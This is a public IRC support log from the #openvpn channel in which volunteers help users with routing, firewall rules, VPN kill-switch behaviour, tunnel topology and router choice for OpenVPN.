Not routing ;) 14:43 <@krzee> right, if you add that to a host machine on the lan it will bypass the gw, and if that works we know 100% you need to fix your gw 14:43 < Cpt-Oblivious> ah 14:43 < Cpt-Oblivious> i understand what you're getting at 14:44 -!- brute11k [~brute11k@89.249.235.177] has quit [Quit: Leaving.] 14:44 < Cpt-Oblivious> netstat something was that 14:44 < Cpt-Oblivious> let me google it 14:44 <@krzee> google what!? 14:44 <@plaisthos> pekster: or crazy setup like sending unsolicited icmp redirects 14:44 < Cpt-Oblivious> how to add a static route again via netstat to a win2008r2 server 14:44 <+pekster> the 'route.exe' command will add routes 14:44 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 14:44 <+pekster> 'route /?' should give you usage syntax 14:44 < Cpt-Oblivious> ah 14:44 < Cpt-Oblivious> yea i see 14:44 <@krzee> route add 10.248.12.0 mask 255.255.255.0 192.168.0.146 14:44 <+pekster> plaisthos: I didn't know people still accepted redirects :P 14:44 <@plaisthos> krzee: you know: irc is just a google frontend with more insults 14:45 <@krzee> lol 14:45 < Cpt-Oblivious> done 14:45 <+pekster> And sometimes really bad advice (wait, google does that too!) 14:45 <@krzee> but we predate google! 14:45 < Cpt-Oblivious> ZOMG 14:45 < Cpt-Oblivious> it works 14:45 < Cpt-Oblivious> fuck you firewall on router 14:45 <@krzee> there, no go fix your router :D 14:45 <+pekster> Why don't you fix it then? 14:45 <@krzee> now* 14:45 <@plaisthos> pekster: i think most modern OSes still accept them 14:45 < Cpt-Oblivious> Damn Asus RT-N66U 14:46 <@plaisthos> pekster: there is no local lan security anyway :) 14:46 <@plaisthos> (icmp redirects from their default gw that is) 14:46 <+pekster> M&M security baby! (do it in an Austin Powers voice for best results) 14:46 < Cpt-Oblivious> hmmm 14:46 < Cpt-Oblivious> maybe that static route on the router 14:46 < Cpt-Oblivious> should that be added on the WAN port? 
14:46 < Cpt-Oblivious> instead of the LAN port 14:46 <@krzee> pekster, most can be dns poisoned as well 14:46 < Cpt-Oblivious> could that be it? 14:47 <+pekster> Sure. TLS or die 14:47 < Cpt-Oblivious> or on the 'MAN' port w/e the hell that is 14:47 <+pekster> Cpt-Oblivious: You probably have a 'firewall' tab somewhere 14:47 < Cpt-Oblivious> yea i do 14:47 < Cpt-Oblivious> it's all turned off 14:47 <@krzee> is it running linux? 14:47 < Cpt-Oblivious> it's an Asus RT-N66U 14:47 < Cpt-Oblivious> just a web interface 14:47 <@krzee> ya i dunno 14:48 < Cpt-Oblivious> Firewall, no, DoS protection, no, Respond to ping requests from WAN, yes. Url filter, off, keyword filter, off. Network services filter, off. 14:48 < Cpt-Oblivious> that's about all the firewall stuff i got. 14:48 <+pekster> You should be able to download a manual online that'll tell you how to add a firewall rule 14:48 < Cpt-Oblivious> i know where to add firewall rules 14:48 < Cpt-Oblivious> but the firewall on that thing is completely off 14:48 <@krzee> probably gotta specifically allow something 14:48 < Cpt-Oblivious> what kind of rule would you suggest i add? 
14:48 <+pekster> You need something to the effect of '-A FORWARD -s 192.168.0.0/24 -d 10.248.12.0/24 -i $lan_if -o $lan_if' in iptables-save syntax 14:49 <@krzee> it says off, but if it was off it would not do NAT 14:49 <+pekster> However you do that in your WebUI, that's for you to figure out 14:49 <@krzee> so its obviously on, but your optional additions are off 14:49 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving] 14:49 <@krzee> pekster, that would have failed on my dd-wrt, it has a rule at the end already blocking stuff, i had to use -I 14:50 <+pekster> iptables-save does not know '-I' 14:50 <@krzee> ahh 14:51 < Cpt-Oblivious> no idea why that router is being a dick 14:51 -!- Guest31276 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Quit: Don't flap your BGP at me sonny] 14:51 <+pekster> And that, is why I run my own OS on my routers 14:51 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 14:51 < Cpt-Oblivious> 'Disable GRO(Generic Recieve Offload)' should that be off? 14:51 <+pekster> "If you want it done right..." 14:52 <+pekster> Nope. You have a basic firewall problem. It's not even NAT because the packets never even make it to the VPN server which is responsible for the network 14:52 < Cpt-Oblivious> I agree pekster 14:52 <@plaisthos> Guest15284: interesting reverse lookup ... 14:52 < Cpt-Oblivious> when i'm getting my 500/500 mbps fiber connection vs the 100/100 mbps one now. I'm building my own PFsense box. 14:53 < Cpt-Oblivious> Would any of you guys want to have a quicklook on my gateway via Teamviewer? 
14:53 < Cpt-Oblivious> maybe i'm missing something trivial 14:54 <@plaisthos> Cpt-Oblivious: probably not 14:54 <@plaisthos> your use case was not considered by the guy designing this thing 14:54 < Cpt-Oblivious> it's a 130 euro router :P 14:55 < Cpt-Oblivious> it just shouldn't block a damn thing :p 14:55 < Cpt-Oblivious> and route :p 14:56 <@plaisthos> that router can handle a 100 Mbit connection? 14:56 < Cpt-Oblivious> yea 14:56 < Cpt-Oblivious> can handle about 800 mbit of WAN traffic 14:56 < Cpt-Oblivious> it's a pretty beefy router 14:56 <@plaisthos> astonishing 14:56 < Cpt-Oblivious> we bought it like 2 months ago 14:56 < Cpt-Oblivious> because the old one crapped out around 150 mbps 14:59 <@plaisthos> You should have hired a professional consultant. Then you probably now had a Cisco ASA for at least ten times the price :) 14:59 < Cpt-Oblivious> lol :P 14:59 < Cpt-Oblivious> I'm a 20 year old student 14:59 < Cpt-Oblivious> this is a home network :P 14:59 < Cpt-Oblivious> I study Computer Science :P 15:00 <@plaisthos> or a CISCO ASR ;) 15:00 < Cpt-Oblivious> nah :P 15:00 < Cpt-Oblivious> I don't mind building my own Pfsense box 15:00 < Cpt-Oblivious> so i can play around with snort and stuff like that 15:00 < Cpt-Oblivious> when i get the 500/500 mbps fiber 15:00 < Cpt-Oblivious> but i'm not gonna spend a fuck load of money on cisco stuff 15:00 <@plaisthos> where you from that you are able to afford a 500/500 fiber? 15:01 < Cpt-Oblivious> The Netherlands 15:01 < Cpt-Oblivious> 500/500 mbps fiber, un metered. Downloading is legal. 
Costs 65 usd / month 15:01 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds] 15:03 <@plaisthos> Cpt-Oblivious: I can get 16/1 MBit DSL for 20 EUR but I cannot get anything faster :/ 15:03 < Cpt-Oblivious> sucks :S 15:03 < Cpt-Oblivious> I got 50/3 mbps for something like that right now 15:04 < Cpt-Oblivious> my friend has 100/100 mbps fiber for 30-35 euro or so 15:04 < Cpt-Oblivious> and i might be moving into an apartment soon which has 500/500 for 50 euro or so 15:04 <+hazardous> nerds 15:04 <+hazardous> (also xs4all owns) 15:05 < Cpt-Oblivious> lol 15:05 < Cpt-Oblivious> no thnx :P 15:05 < Cpt-Oblivious> though xs4all fiber ain't bad 15:05 < Cpt-Oblivious> any fiber is good :P 15:06 -!- lsa [~la@pdpc/supporter/active/lsa] has joined #openvpn 15:08 < lsa> I have an OpenVPN server using UDP. Multiple clients are attempting to connect from a single IP address. There are issues getting connected/staying connected. Should this be expected with this situation? UDP + multiple clients from same NATed IP. 15:12 <@plaisthos> broken nat gw 15:12 <@plaisthos> probably 15:12 <@plaisthos> are you using nobind? 15:13 <@plaisthos> if not try again with nobind in client configs 15:19 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 15:24 < lsa> plaisthos: I'll try that, thank you. 15:24 < lsa> plaisthos: Just add "nobind" to a new line in the config file, right? 
15:28 -!- Guest78377 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 15:28 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 15:34 -!- Guest78377 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 15:34 -!- Guest78377 [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 15:35 -!- Guest78377 [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Quit: Don't flap your BGP at me sonny] 15:35 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 15:35 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 15:35 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 15:49 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 15:50 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 16:02 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 16:09 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 16:14 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 16:14 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 16:18 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 16:42 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 16:50 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 16:55 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 16:57 <@plaisthos> lsa: yes 17:09 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 17:17 -!- Azrael_- [~idjfijdi@adsl-62-167-40-41.adslplus.ch] has joined #openvpn 17:17 < Azrael_-> hi 17:22 < lsa> plaisthos: it worked. thanks a lot. 
17:22 < lsa> have a good weekend 17:22 -!- lsa [~la@pdpc/supporter/active/lsa] has quit [Quit: leaving] 18:03 -!- medum [kevin@2607:f2f8:a4c4::2] has joined #openvpn 18:04 < medum> hi all. how would i go about making openvpn fail open? 18:06 <+rob0> and that means ... ? 18:10 <@krzee> medum, try your translation app again =] 18:11 < medum> meaning openvpn connection dies, internet is cutoff completely. rather than reconnecting without using the vpn at all 18:11 <@krzee> !def1 18:11 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 18:11 <@krzee> dont use def1 18:12 <@krzee> def1 makes it so you stay connected without the vpn, without it openvpn does what you desire 18:14 < medum> i'm not using def1 now and it doesn't look like it's used by default either 18:17 <@krzee> then you have no route to the internet without your vpn 18:17 <@krzee> if you are using redirect-gateway 18:18 < medum> i just tried adding redirect-gateway without def1 to my config. but pkill openvpn still sends traffic without the vpn 18:20 <@krzee> show me your routing table while openvpn is running, and after you stop it 18:23 < medum> default 192.168.1.1 wlan0 is there in the before and after 18:24 < medum> guess it has to be 18:27 < medum> http://pastebin.com/NTKfhuzK 18:31 <+rob0> that sure looks like def1 to me 18:31 < medum> redirect-gateway is in my config 18:39 <@krzee> !configs 18:39 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. 
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 18:39 <@krzee> both 19:04 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 252 seconds] 19:05 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 19:09 -!- videl_ is now known as videl 19:17 -!- Devastator- [~devas@177.18.199.7] has joined #openvpn 19:18 -!- raidz is now known as raidz_away 19:19 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 19:20 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 19:31 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:31 -!- mode/#openvpn [+o krzee] by ChanServ 19:44 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 265 seconds] 19:46 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 19:46 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 19:47 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 19:47 -!- Denial- is now known as Denial 20:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Remote host closed the connection] 20:04 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 20:15 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 20:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 20:15 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Client Quit] 20:24 <+hazardous> yo 20:32 -!- Devastator- [~devas@177.18.199.7] has quit [Changing host] 20:32 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 20:34 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined 
#openvpn 20:40 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 20:41 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 20:48 -!- Devastator- is now known as Devastator 20:48 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 246 seconds] 21:01 -!- kyrix [~ashley@97-113-115-104.tukw.qwest.net] has quit [Remote host closed the connection] 21:03 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:05 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 21:28 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:43 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has quit [Quit: Leaving.] 21:45 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 245 seconds] 21:48 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has joined #openvpn 21:57 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 22:01 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 22:06 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:07 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has joined #openvpn 22:12 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 264 seconds] 22:12 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 22:12 -!- [fred] [fred@konfuzi.us] has quit [Remote host closed the connection] 22:17 -!- MeanderingCode [~Meanderin@71-213-184-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 22:17 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn [] 22:20 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 22:21 -!- [fred] [fred@konfuzi.us] has joined 
#openvpn 22:24 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn 23:02 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 23:08 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 23:16 -!- troy- [~troy@dcamp-bbr1.prg1.eu.tauri.ca] has joined #openvpn 23:16 < troy-> is it possible to create a point-to-point VPN with a /30 instead of /32s on each side? 23:21 <+pekster> troy-: This is what the net30 topology does. If your systems support a true PtP mode, why not use that instead? 23:23 < troy-> pekster: my endpoints are ubuntu servers configured based on the http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html tutorial 23:23 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net) 23:23 < troy-> how would i know whether i can support 'true PtP mode'? 23:23 <+pekster> Linux does (basically it's just Windows that can't) 23:24 < troy-> gotcha - where might i read how to make the necessary changes? 23:24 < troy-> (i prefer PSK over certificates) 23:24 <+pekster> Why? You lose perfect forward secrecy, and if your keys are ever compromised all the past encrypted sessions can be decrypted with the key 23:25 < troy-> i have a lot of tunnels :P 23:25 < troy-> so i guess my answer is simplicity of installation 23:26 <+pekster> I can't say I agree, but as long as you understand the security advantages of a TLS/DH key exchange and don't want it, that's fine 23:27 < troy-> all the application traffic is encrypted anyway 23:28 < troy-> can you suggest where i might start reading up on the required changes? 23:29 < ngharo> !topology 23:29 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. 
or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 23:31 < troy-> ngharo: so on the server side i just add directive "topology net30"? 23:32 < ngharo> net30 is the default 23:32 <+pekster> On both sides, since you can't push directives in p2p modes 23:32 < troy-> if that were the case i wouldnt have a /32 mask 23:32 < troy-> pekster: thanks 23:33 <+pekster> I'm not actually sure you can use topology net30 with --secret, but I'm looking into that now. I don't see what you're trying to do, really 23:34 <+pekster> Apparently you can (I suppose to support Windows clients) 23:34 < ngharo> troy-: you'll see your tun interface is configured with inet addr and p-t-p IP, these fall inside the /30 your client is assigned 23:36 < ngharo> (assuming youre currently not specifying topology) 23:36 < troy-> ngharo: i updated the config and restarted the tunnel however ifconfig still shows a mask of .255 23:37 < troy-> i'm just trying to segment my network so that i dont have to advertise /32s 23:37 <+pekster> Well, that's only a limitation of Windows ngharo. I can do 'ifconfig 10.1.2.3 192.168.7.8' just fine if using the p2p topology, as an overly-insane example 23:38 < troy-> pekster: are there additional changes i would have to make to the static key howto that i perhaps dont recognize? 23:38 < troy-> (aside from adding that line to each endpoint and restarting) 23:38 <+pekster> troy-: What are you trying to "fix"? I think Linux distros might use PtP anyway (the net30 is really just a hack to make p2p topology "work" under Windows) 23:40 < ngharo> it kind of sounds like he may want topology subnet with a /30 ip-pool? 23:40 < ngharo> but only two hosts total on the vpn? i dunno 23:40 <+pekster> He can't *have* an "ip-pool" in p2p mode (he's using --secret, not X509) 23:41 < ngharo> oh, i didnt think static key affected any options 23:41 < ngharo> ignore me :) 23:44 <+pekster> troy-: Yea, I just tested it. 
net30 under non-Windows just uses PtP anyway, since it's just an emulation trick to make Windows work 23:44 <+pekster> troy-: So, let's get back to why you want this? 23:45 <+pekster> I really have no clue what you're trying to fix, because nothing is broken with a p2p setup 23:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 23:49 < troy-> pekster: i'm going to take this back to the drawing board -- thanks for your help 23:50 <+pekster> troy-: Yea. If you're doing BGP/OSPF or something and want larger routes, you're free to supernet/subnet as you desire, as with any traditional network. But p2p is "just 2 IP addresses", and even the notion of an IP address is just a virtual way to identify your peer 23:51 <+pekster> Technically, you can do something this stupid (PS: demo purposes only, "don't try this at home", etc) https://pastee.org/g65xx 23:52 < ngharo> what the hell pekster lol 23:52 <+pekster> Hey, it was just an example of what you "can" do (and very much should *not* do) ;) 23:53 < ngharo> pekster: are there advantages of using p2p over subnet? 23:53 < troy-> oh my this is interesting :P 23:53 <+pekster> For multi-client (aka server) mode? No, not at all 23:54 < ngharo> why isnt subnet default? for static key configs? 23:54 <+pekster> 'topology p2p' is used when you're doing just a p2p use (such as troy- has configured) or when you need to support OpenVPN 2.0.9 and don't need Windows support (I did a roll-out like that a while back) 23:54 <+pekster> Yea, I think so ngharo. IIRC there's a note in the manpage that it'll become the default 23:54 < ngharo> gotcha 23:55 <+pekster> Our server was 2.1 or 2.2, but the embedded device we were using only supported 2.0.9 or something. 
It was far easier to use p2p topology (all Linux-based platforms) than get a newer build working with the buildsystem 23:55 <+pekster> Dunno, that was last job 23:56 <+pekster> Oh, btw, assuming I didn't screw up those configs, they're fully usable (drop in static keys and you're set!) and it'll even route across all 4 systems :D 23:56 <+pekster> http://pekster.sdf.org/misc/crazy-ovpn-p2p.png 23:57 < troy-> i didnt know you could buy yellow paper anymore 23:57 <+pekster> I think that was after around 23 hours of no sleep and half a bottle of wine? Maybe more? ;) 23:58 < ngharo> :] 23:58 < troy-> pekster: is there an easy way to monitor tunnel status for p2p? 23:58 <+pekster> Monitor? As in, if it get disconnected? --up and --down should let you hook into that if you need 23:59 <+pekster> That's available for all modes/topologies --- Day changed Sat Jan 05 2013 00:00 < troy-> that will tell me whether the tunnel is up? 00:00 < sw0rdfish> can someone hack into my openvpn? 00:00 <+pekster> It will with the --ping/--ping-exit (or --ping-restart) options 00:01 <+pekster> Oh, that's server mode only though 00:01 <+pekster> So, no, not really, without pinging your peer or something 00:01 < troy-> gotcha :/ 00:01 < troy-> i have no way to monitor because my network is fully meshed 00:01 <+pekster> If you used X509 mode you could do what you want ;) 00:01 < troy-> *sigh* 00:01 < troy-> may have to 00:02 <+pekster> (that has a TLS control channel where --ping* options or the --keepalive helper directive will detect the presence of the remote peer) 00:02 < ngharo> what bout querying the management interface 00:03 <+pekster> The problem is if "no" traffic is being sent over a p2p, static-key setup, you can't know if the connection was "dropped" or if it's just silent 00:03 <+pekster> It's like asking me to know if google is up when I'm not sending any traffic there 00:03 < ngharo> ah interesting 00:03 < ngharo> i never played with static key setups 00:03 <+pekster> If *I* 
can't access google, that doesn't mean they're down, it just means I can't reach it. If the whole channel can't, we might assume google has some issue 00:03 < ngharo> i guess thats why i've heard you say it's better when dealing with dpi firewalls 00:04 <+pekster> Same issue: is the VPN down on the peer, or is my ISP blocking the traffic? We don't know 00:05 <+pekster> sw0rdfish: In theory? Yes. In practice, even a skilled attacker (NSA, etc) would be hard-pressed to do it (they'd probably just sneak into your house and get your keys/passwords while you're at work anyway) 00:06 <+pekster> Ask a more specific question, and get a more specific answer ;) 00:06 < ngharo> !shotgun 00:06 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun. 00:06 < ngharo> love that 00:06 <+pekster> Also on point: https://xkcd.com/538/ 00:06 <@vpnHelper> Title: xkcd: Security (at xkcd.com) 00:07 < ngharo> haha 00:10 < sw0rdfish> pekster, well... its just that when I opened paltalk right now on my laptop, I found another nickname listed there.... it lists all the nicknames with which you have logged on to paltalk at least once 00:10 < sw0rdfish> and I only use one nickname.... and when I saw the other I was like wtffff 00:10 < sw0rdfish> so I dunno. 00:11 <+pekster> I have no clue what "paltalk" is 00:12 <+pekster> OpenVPN, configured, set up, managed, and where all users holding private keys, are operated correctly, is a very, VERY secure system. Weakness at any of those points can reduce the security 00:16 <+pekster> ngharo: Another neat trick with p2p setups (either OpenVPN, or even a crossover Ethernet wire between 2 PCs) is to define the same address on each system, so long as the peer is different. 
ie: 10.0.0.1 is always "this" system, and 10.0.0.2 is "the other" system ;) 00:17 < ngharo> 0_o 00:17 <+pekster> More for the "don't do that at home" tricks, but it's fun to do with someone watching over your shoulder as you rsync files across 2 PCs with a cat5e and gigE cable between them :D 00:18 < ngharo> i've done crossover for transfering data but i dont get the using same IP part 00:19 < ngharo> how would the other end know to respond on .2? 00:19 <+pekster> Because it's a p2p link ;) 00:20 < ngharo> was this discovery the result of another late night binge? ;) 00:20 <+pekster> No, that trick I knew. I don't usually set up ovpn configs to glue them together unless I'm a bit tipsy ;) 00:20 < ngharo> haha 00:21 <+pekster> Do it on a cross over cable? Sure, it's a fun party trick. Set up a virtual link of 4 systems with complete routing doing it? Now you're just crazy 00:23 < ngharo> virtual daisy chaining 00:23 <+pekster> Yea, basically. It's just a virtual set of a bunch of crossover cables 00:24 < ngharo> goo Devastator 00:24 < ngharo> oops 00:25 < ngharo> good times :) i got a flight to catch in the AM... 
night all 00:36 -!- HyperGlide [~HyperGlid@182.151.60.13] has joined #openvpn 00:53 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [Read error: Connection reset by peer] 00:53 -!- m0sphere` [m0sphere@S01060018e78c9cff.cg.shawcable.net] has joined #openvpn 01:03 -!- HyperGlide [~HyperGlid@182.151.60.13] has quit [Remote host closed the connection] 01:55 -!- brute11k [~brute11k@89.249.235.187] has joined #openvpn 02:15 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 03:33 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Ping timeout: 248 seconds] 03:39 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 04:17 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 04:51 -!- mattock [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 04:51 -!- mode/#openvpn [+o mattock] by ChanServ 05:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 05:23 -!- LumberCartel [~LumberCar@96.53.47.42] has joined #openvpn 05:23 -!- LumberCartel [~LumberCar@96.53.47.42] has left #openvpn [] 05:35 -!- ade_b [~Ade@koln-4d0b5627.pool.mediaWays.net] has joined #openvpn 05:35 -!- ade_b [~Ade@koln-4d0b5627.pool.mediaWays.net] has quit [Changing host] 05:35 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 05:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 05:54 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 06:10 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Remote host closed the connection] 06:14 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 06:21 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 06:41 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Quit: Ex-Chat] 07:31 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 07:35 -!- cosmicgate- 
[~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [Ping timeout: 244 seconds] 07:35 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has joined #openvpn 07:46 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 07:48 -!- baobei_ [~baobei@208.111.39.160] has joined #openvpn 07:50 < baobei_> hey ho 07:51 < baobei_> a friend has a kindle fire, afaik openvpn won't work on that, so the only option is to buy a router that supports openvpn 07:51 < baobei_> is there a list of some decent routers that can handle openvpn? 07:52 <+EugeneKay> Anything that supports openwrt or one of the custom embedded firmware linux distros 07:52 < baobei_> is there a recommended minimum ram, cpu requirement 07:53 < baobei_> i once bricked a router trying to install openwrt lol 07:53 <+EugeneKay> ANd you can reflash the Fire to CM10, which definitely does oepnvpn 07:54 < baobei_> it was an xmas gift and he's not very tech savy, i dont think he'd want to mess with it 07:54 <+EugeneKay> I know precisely zero about integrated routers, sorry. I use an i3-540 with 8GB of RAM running a full server stack :-p 07:54 < baobei_> anyway thanks you've pointed me in the right direction 07:56 < baobei_> if anyone knows about openvpn on routers, would 64mb of ram be enough? 
and 8mb flash, thanks 08:18 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 08:23 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Read error: No route to host] 08:23 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 08:38 -!- cosmicgate- [~cosmicgat@you.think.japan.is.cool.well.cosmicgate.is.stuck.injp.net] has quit [] 08:44 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 08:46 -!- baobei_ [~baobei@208.111.39.160] has quit [Ping timeout: 245 seconds] 08:47 -!- Porkepix [~Porkepix@83.159.5.235] has quit [Read error: Operation timed out] 08:50 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has joined #openvpn 08:56 -!- baobei_ [~baobei@58.37.20.245] has joined #openvpn 09:08 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn 10:01 -!- Porkepix [~Porkepix@lns-bzn-23-82-248-114-106.adsl.proxad.net] has quit [Quit: Computer has gone to sleep.] 
10:36 < hg_5> hello, i have a problem when im trying to connect to my openvpn server, i get this error in openvpngui Error: cannot locate HMAC in incoming packet from
10:36 < hg_5> Error: cannot locate HMAC in incoming packet from xxx.xxx.xxx.xxx:1194
--- Day changed Sun Jan 06 2013
01:15 < soulcito> is possible to configure a openvpn client without encryption?
01:15 <@krzee> !noenc
01:16 <@vpnHelper> "noenc" is (#1) if you're going to disable encryption, you might as well build a GRE tunnel or (#2) but you would use cipher none
01:16 <@krzee> you really dont want openvpn involved if you dont want encryption
